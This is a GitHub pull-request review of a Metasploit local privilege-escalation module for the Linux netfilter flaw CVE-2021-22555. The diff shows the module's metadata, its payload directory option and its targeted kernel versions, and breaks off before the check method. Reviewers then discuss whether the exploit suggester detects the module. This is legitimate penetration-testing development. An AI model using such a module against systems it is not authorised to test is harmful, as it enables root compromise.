modules/exploits/linux/local/netfilter_priv_esc.rb

```diff
@@ -0,0 +1,138 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GreatRanking
+  include Msf::Post::Common
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Netfilter Privilege Escalation',
+        'Description'    => %q{"
+          A heap out-of-bounds write affecting Linux since v2.6.19-rc1 was discovered in net/netfilter/x_tables.c.
+          This allows an attacker to gain privileges or cause a DoS (via heap memory corruption) through user name space.
+          Kernels up to 5.11 (including) are vulnerable.
+          More information about vulnerable kernels is
+          available at https://nvd.nist.gov/vuln/detail/CVE-2021-22555#vulnConfigurationsArea
+        "},
+        'License'        => MSF_LICENSE,
+        'Author'         =>
+          [
+            'Andy Nguyen (theflow@)', # The original author of this exploit
+            'Szymon Janusz' # The author of this module
+          ],
+        'DisclosureDate' => '2021-07-07', # YYYY-DD-MM. Public disclosure date
+        'Platform'       => 'linux',
+        'Arch'           => [ARCH_X64, ARCH_X86],
+        'SessionTypes'   => ['meterpreter', 'shell', 'shell linux'],
+        'Targets'        =>
+          [
+            ['Automatic', {}]
+          ],
+        'DefaultTarget'  => 0,
+        'Notes' => {
+          'Reliability' => [ UNRELIABLE_SESSION ], # The module could fail to get root sometimes.
+          'Stability' => [ OS_RESOURCE_LOSS ], # After too many failed attempts, the system needs to be restarted.
+          'SideEffects' => [ ]
+        },
+        'References' =>
+          [
+            ['CVE', '2021-22555'],
+            ['URL', 'https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html'],
+            ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2021-22555'],
+            ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22555'],
+            ['URL', 'https://ubuntu.com/security/CVE-2021-22555']
+          ]
+      ))
+
+    register_options(
+      [
+        OptString.new('PAYLOAD_DIR', [true, 'Directory to write persistent payload file.', '/var/tmp'])
+      ]
+    )
+
+    deregister_options('ContextInformationFile', 'WfsDelay')
+  end
+
+  def base_dir
+    datastore['PAYLOAD_DIR'].to_s
+  end
+
+  def supported_kernels
+    ['5.8.0-48-generic', '5.4.89']
+  end
+
+  def kernel_supported?(kernel)
+    supported_kernels.include? kernel
+  end
+
+  def check
```

Comment:
It's worth checking that this module gets suggested as part of the local_exploit_suggester, i've had some modules not be suggested to me - when they should've work as expected :+1:

Reply:
What do you mean?

The `check` method will work with local_exploit_suggester unless the `check` method is inaccurate. In what way do you think the `check` method is inaccurate?

Reply:
This does seem to be an issue: (unless that is an issue with the ssh shell not having an architecture?)
![image](https://user-images.githubusercontent.com/85949464/134371269-d3dc74f3-7e85-4af6-8f6b-9c9a6cac3afe.png)

Reply:
> This does seem to be an issue: (unless that is an issue with the ssh shell not having an architecture?)

There's probably something else going on here. Unlikely to be related to this module (presuming that the `check` method works as intended when run normally).

Reply:
Thanks for checking that out @sjanusz-r7 - happy to treat it as a separate issue, unless the `check` method is broken as bcoles suggests

Reply:
The method seems to work correctly.

Vulnerable kernel:
![image](https://user-images.githubusercontent.com/85949464/134373930-71e475bd-0493-4461-b42e-9e601750e6cc.png)

Kernel that I have not added to the list of supported kernels:
![image](https://user-images.githubusercontent.com/85949464/134374028-bf9d8a29-7388-4652-9111-eba77a43ff7b.png)

Reply:
unrelated to your PR here but looks like there might be a bug there wit hthe session architecture not printing? also it should be compatible right? 
https://github.com/rapid7/metasploit-framework/blob/ddd1d37d4b842577df8f4d5e553a641c4dd8010f/lib/msf/core/post_mixin.rb#L199